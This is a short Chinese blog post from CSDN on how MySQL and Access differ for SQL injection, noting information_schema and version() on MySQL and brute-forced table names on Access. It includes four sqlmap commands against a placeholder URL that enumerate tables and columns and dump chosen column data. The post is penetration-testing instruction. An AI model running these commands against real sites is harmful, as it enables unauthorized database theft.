数据库管理系统对SQL注入的影响

最新推荐文章于 2022-07-23 00:22:52 发布
最新推荐文章于 2022-07-23 00:22:52 发布
阅读量498 收藏
点赞数 1
分类专栏: WEB安全 文章标签: SQL注入 access
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duangduang2020/article/details/49032885
版权

Why

首先说明为什么不同呢?不同数据库管理系统基本的SQL语句相同,但是支持的某些函数,数据库的整体结构和组织方式是不相同的。比如mysql数据库中特有的information_schema数据库,里面存有所有的数据库名称,以及各个数据库中表的名称等等信息。

对SQL注入的影响

数据库管理系统的不同导致SQL注入时,进行利用的方式和难度不相同,Mysql数据库中直接通过version()等函数以及infomation_schema数据库得到数据库版本,用户名以及所有数据库的信息。但access就不能通过这些方式。

SqlMAP对不同数据库的处理

SqlMap在对access数据库进行处理时,不能使用-dbs等选项,进行数据表的枚举时,采用的是暴力破解的方式,字典位于txt/common-tables.txt中。

SqlMAP对Access数据库架构网站注入的步骤如下:

sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3

sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3 --tables //枚举表

sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3  --columns -T  "tablename"   // 枚举列名

sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3 --dump -C "name1, name2" -T "tablename" //获取name1, name 2列的数据

SqlMAP对mysql数据的注入步骤见《metasploit渗透测试魔鬼训练营》 之 SQL注入

duangduang2020
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入(不同数据库之间)
qi_SJQ_的博客
11-08 1197
简要学习各种数据库的注入特点: 数据库Access, mysql ,mssql(sql server) mongoDB, postgresql, sqlite,oracle, sybase等。 工具:Sqlmap, NoSQLAttack, Pangolin等。 其他数据库大体结构都相同,但access数据库存在于asp网站内的一个文件夹下,不同网站对应不同数据库。 因此注入方式有所不同,不用注库名,而且没有access数据库没有文件读写功能等等特点。 故有以下结构: ...
不同数据库SQL注入不同手工注入方法的汇总
weixin_48421613的博客
06-10 1421
不同数据库的注入方式 以下资源部分为自己的理解,部分为墨者上面的解题思路,此处做的是汇总,由于不知墨者大佬的出处,故无法做出转载地址,所以此文归类为转载,若是墨者大佬在这里看到了属于你的文章,觉得我发不太好请及时联系我,我好做删除处理 Mysql手工注入 大家可以去看一下博客,有很详细的讲解如何进行sql注入 https://blog.csdn.net/weixin_48421613/article/details/107488560 https://blog.csdn.net/weixin_4842161
为什么数据库使用SQL语言?
xingduan5153的博客
11-26 484
一直以来,数据的持久化都是依赖于文件存储,包括windows的excel,word,txt等,数据库也是使用的文件,比如oracle的.DBF;Access的.mdb都是使用的文件。既然是文件,我们知道计算机只识别0,1两个机器码,其实文件就都是一系列的二进制编码,不同的文件使用不同的方式打开,比如在windows上强制使用文本方式打开dbf文件显示一堆...
SQL注入攻击介绍】
qq_55213436的博客
07-23 7282
sql注入已知以来都稳居owasp-top10榜首,近年来更是爆出很多的数据库泄露攻击事件。今天简单的分析以下sql注入的一些特性和方式。
三种数据库的 SQL 注入详解
热门推荐
YT的博客
02-25 11万+
SQL 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL 注入分类 1. 数字型注入 当输入的参数为整型时,则有可能存在数字型注入漏洞。 假设存在一条 URL 为:HTTP://www.aaa.com/test...
学生信息管理系统--SQL注入
令仔很忙
08-18 3613
当你在登陆学生管理系统的时候,添加的用户名若和你数据库中的数据不符时,就弹出一个窗体,告诉你没有这个用户;但是当你在用户名中输入数字或者字母外加英文状态下的单引号,比如:“a'”
SQL数据库在线管理系统源码.zip
06-19
通过深入学习和分析SQL数据库在线管理系统源码,不仅可以提升数据库管理技能,还能对Web开发、服务器端编程和数据库设计有更全面的理解,为今后的项目开发奠定坚实基础。在实际操作中,结合文档和注释,逐步理解和...
Sql数据库的Web管理系统源码.zip
06-19
《Sql数据库的Web管理系统源码解析》 在信息化时代,数据管理成为了企业运营的重要环节,而...深入理解并实践"Sql数据库的Web管理系统源码",不仅能增进对数据库管理的理解,还能为开发自己的管理系统奠定坚实基础。
eml企业通讯录管理系统 v5.4.4 SQL注入1
08-03
本文将深入探讨Eml企业通讯录管理系统v5.4.4中的SQL注入漏洞,这是一种常见的安全问题,可能导致数据泄露、系统权限篡改等严重后果。首先,我们要理解SQL注入的基本概念和其在该系统中的具体表现。 **SQL注入**是...
SQL注入漏洞发现和数据库监控系统.zip
最新发布
05-27
本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 首先,让我们了解SQL注入的基本原理。当用户输入的数据未经充分过滤或转义就被直接拼接到SQL查询语句中,攻击者可以通过构造特殊的输入来执行...
学生成绩管理系统管理系统源代码java+sql server
05-14
适合大学生毕业设计源代码,本系统主要分为5大功能模块,分别为:  登录模块:实现用户登录。  参数设置:包括学生年级设置、班级设置、考试科目设置以及考试类别设置。  基本信息:包括学生信息、教师信息以及学生考试成绩信息管理。  系统查询:包括基本信息查询、成绩信息查询以及汇总查询。  系统管理:包括用户维护、系统退出等功能。
学生管理系统(Mysql数据库版)
04-07
1. **Mysql数据库**:Mysql是一款开源、免费的关系型数据库管理系统,具有高性能、高可靠性和易于使用的特性。在本系统中,Mysql用于存储学生的基本信息、课程信息、成绩等数据,通过SQL(结构化查询语言)进行数据...
SQL是什么?有什么优点
09-14 617
SQL是什么?有什么优点 Structure Query Language(结构化查询语言)简称SQL,它被美国国家标准局(ANSI)确定为关系型数据库语言的美国标准,后被国际化标准组织(ISO)采纳为关系数据库语言的国际标准。数据库管理系统可以通过SQL管理数据库;定义和操作数据,维护数据的完整性和安全性。 SQL的分类 1、DDL(Data Definition Language) 数据定义语言,用来操作数据库、表、列等; 常用语句:CREATE、 ALTER、DROP 2、DML(Data
什么是数据库事务,为什么要引入数据库事务,数据库事务的特征是什么
libaoshan55的博客
10-08 2万+
文章代码或者内容有任何问题,读者可留言相告,不胜感激!!!! 事务(Transaction)是并发控制的基本单位。所谓的事务,它是一个操作序列,这些操作要么都执行,要么都不执行,它是一个不可分割的工作单位。例如,银行转账工作:从一个账号扣款并使另一个账号增款,这两个操作要么都执行,要么都不执行,在关系数据库中,一个事务可以是一条SQL语句、一组SQL语句或整个程序。 。所以,应该把它们看成一个事
sql数据库开发-1:为什么要用到数据库
kerryqpw的博客
12-26 526
为什么要用到数据库? 软件的运行都是在内存中运行,运行完成断电,释放内存,程序运行结束或开始时都要 将数据存档硬盘中,或将数据从硬盘中取出到内存中使用,就需要一个专门的媒介(数据库) 变量就是一个中转站,一个仓库 数据库就是一个大的变量,大的数据仓库。 数据库是编程语言的重要组成部分 如需熟练的掌握数据的运转,还需熟练应用Excel、EditPlus、UE 数据有很多种表...
卧槽,SQL注入竟然把我们的系统搞挂了!
码农翻身
02-21 1515
前言先来给大家看个漫画,原创是xkcd,我把它翻译成了中文。如果你能在看漫画的时候能心一笑,基本上就理解什么是SQL注入了,这里再啰嗦两句, 来个更简单的例子, 例如这个SQL做了字符...
SQL Server中各个系统数据库的作用
qq_19925065的博客
12-25 3435
master数据库 master是SQL Server2012中最重要的数据库,是整个数据库服务器的核心。里面包含了:所有用户的登录信息、用户所在的组、所有系统的配置选项、服务器中本地数据库的名称和信息、SQL Server的初始化方式等。不能损坏master数据库,否则整个SQL Server服务器不能工作 model数据库 model数据库是SQL Server 2012中创建数据库的模
初识数据库数据库管理系统与SQL
GSON的博客
04-10 415
一、数据库数据库管理系统 什么是数据库呢?下面我们给出数据库的定义 数据库database 简写 :DB,它是一个以某种有组织的方式存储的数据集合。我们可以理解为它是一个保存有组织数据的容器 数据库管理系统(DBMS),数据库是通过DBMS创建和操作的容器,很大程度上你不需要直接访问数据库,你使用的时DBMS,他替你访问数据库 二、数据库的组成部分 表(table):某种特定类型...
代码审计工具简单汇总
duangduang2020的博客
01-18 3703
一:php工具 使用zend studio、Phpstorm等工具可以分析调试PHP程序,UE经过配置之后也可以调试执行PHP程序。 二:seay、RIPS、Findbugs、Fortify SCA是源代码审计工具。 seay是基于.net framework2.0 RIPS是PHP语言编写,在浏览器执行时,需要高版本,在IE6上执行错误,firefox木有问题 Findbugs

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值